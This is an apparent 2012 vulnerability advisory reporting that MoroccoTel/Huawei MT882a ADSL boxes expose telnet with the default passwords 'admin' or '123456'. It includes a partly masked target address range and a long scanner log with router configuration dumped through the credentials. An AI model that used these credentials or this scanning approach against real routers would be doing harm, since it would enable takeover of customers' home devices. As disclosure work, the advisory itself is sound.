what you don't know can hurt you

MoroccoTel Default Password

MoroccoTel Default Password
Posted Apr 25, 2012
Authored by Jerome Athias

MoroccoTel boxes suffer from an issue where there is a default password that can be used on the telnet server.

tags | exploit
MD5 | ea72ca9ae12fae7f54519bfaaf0b4c1e

MoroccoTel Default Password

Change Mirror Download
Hi,

a "vulnerability" was identified on MoroccoTel Boxes:
a telnet server is running, open to the web, with a default password of
admin (or 123456)

This critical vulnerability can affect the entire network of a Country.

Solution: change the default password account or modify the default firmware

NB: a new firmware was released, introducing a cipher on the "PPOE
password" (one common, publicly available PPOE account is largely used)

Discovered by NETpeas research team, NETpeas CERT is trying to contact
the ISP

More details:

Password:
telnettry
41.141.*.* -> Response telnet02: ****
Copyright (c) 2001 - 2006 Huawei
MT882a>
***********************************************************
41.141.*.* -> TELNET PASSWORD FOUND: admin

MT882a> show all

RAS version: V100R001B022 MoroccoTel 2010/02/26
System ID: $5.0.152.1(RUE0.C2)3.11.2.151 20110602_V001 [Jun 02 2011
13:54:48]
romRasSize: 1217226
system up time: 2:45:45 (f2cc9 ticks)
bootbase version: VTC_SPI1.5| 2011/05/26


Hostname = MT882a
Message = <empty>
ip route mode = Yes
bridge mode = Yes
DHCP setting:
DHCP Mode = Server
Client IP Pool Starting Address = 192.168.1.2
Size of Client IP Pool = 64
Primary DNS Server = 8.8.8.8
Secondary DNS Server = 8.8.4.4
DHCP server leasetime = 86400
TCP/IP Setup:
IP Address = 192.168.1.1
IP Subnet Mask = 255.255.255.0
Rip Direction = None
Version = Rip-1
Multicast = IGMP-v2


RemoteNode = 0
Rem Node Name = ISP-0(ISP)
Encapsulation = PPPoE
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/35
IP Routing mode= Yes
Bridge mode = No
PPP Username = <snip>

PPP Password
41.141.*.* -> = *******
PPP Username_ext2 =
PPP Password_ext2 =
Service name =
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = Yes
Multicast = None
Default Route node = Yes

RemoteNode = 1
Rem Node Name = ISP-1
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel
41.141.1.9 -> Port 80 open
41.141.*.* -> active = Yes
VPI/VCI value = 0/35
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0

41.141.*.* -> IP address assignment type = Dynamic

41.141.*.* -> SUA = No
Multicast = None
Default Route node = No

RemoteNode = 2
Rem Node Name = ISP-2
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/32
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 3
Rem Node Name = ISP-3
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/32
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 4
Rem Node Name = ISP-4
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/81
IP Routing mode= No
Bridge mode = Yes
Remote IP
41.141.*.* -> Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 5
Rem Node Name = ISP-5
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/100
IP Routing mode= No
Bridge mode = Yes
Remote IP A
41.141.*.* -> ddr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
sMulticast = None

41.141.*.* -> yDefault Route node = No
s
RemoteNode = 6
aRem Node Name = ISP-6t
sEncapsulation = hRFC 1483

Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 1/39
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 7
Rem Node Name = ISP-7
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/16
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

MT882a>
RAS version : V100R001B022 MoroccoTel
romRasSize : 1217226
bootbase version : VTC_SPI1.5| 2011/05/26
Product Model : SmartAX

MAC Address : <snip-inclear>

Default Count
41.141.*.* -> ry Code : FF

Boot Module Debug Flag : 00

RomFile Version : 9F

RomFile Checksum : dceb

RAS F/W Checksum : 87b7

SNMP MIB level & OID : 050000000100000002000000030000000400000005

Main Feature Bits : 86

Other Feature Bits :
93 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 13 00 00 00
MT882a>
41.141.*.* -> e
41.141.*.* -> ther config
--------------- NDIS CONFIGURATION BLOCK ----------------
type=1 flags=0001
Board/Chassis:1 Lines/Board:1 Channels/Lines:2 Total Channel:2
task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
board-pp (8042c8f0)
804273fc
line-pp (8042c8f4)
8042956c
chann-pp (8042c8f8)
804bf8a4 804bfe34
--------------- BOARD DISPLAY ---------------------------
ID slot# n-line n-chann status line-cfg chann-cfg
00 0 1 2 0001 8042c8bc 8042c8d0
--------------- LINE DISPLAY ---------------------------
ID line# board-id n-chann chann-cfg
00 1 00 2 8042c8d0
--------------- CHANNEL DISPLAY -------------------------
ID chan# line-id board-id address name
00 1 00 00 804bf8a4 enet0
01 2 00 00 804bfe34 enet1
MT882a>


--
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca
Mobile: +212665346454
www.netpeas.com
---------------------------------------------
Stay updated on Security: www.vulnerabilitydatabase.com

"The computer security is an art form. It's the ultimate martial art."

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    5 Files
  • 21
    Apr 21st
    1 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close